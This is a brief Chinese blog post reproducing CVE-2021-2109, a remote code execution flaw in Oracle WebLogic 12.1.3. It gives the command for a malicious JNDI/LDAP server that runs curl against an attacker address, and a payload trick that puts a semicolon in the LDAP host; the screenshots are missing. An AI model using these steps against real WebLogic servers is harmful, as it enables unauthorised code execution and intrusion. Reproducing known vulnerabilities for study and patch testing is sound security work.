CVE-2021-2109 Weblogic远程代码执行漏洞复现

环境:

Weblogic 12.1.3.0.0

1.开启LDAP服务

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 0.0.0.0 -C "curl [Address]:5555"

CVE-2021-2109 Weblogic远程代码执行漏洞复现

2.使用Payload

PS:ldap://x.x.x;(分号)x:1389/xxx

CVE-2021-2109 Weblogic远程代码执行漏洞复现

 3.效果

CVE-2021-2109 Weblogic远程代码执行漏洞复现

参考链接:

https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw

CVE-2021-2109 Weblogic远程代码执行漏洞复现

上一篇:pytest生成html报告-使用pytest-html插件方式


下一篇:linux切换php版本--centos7配置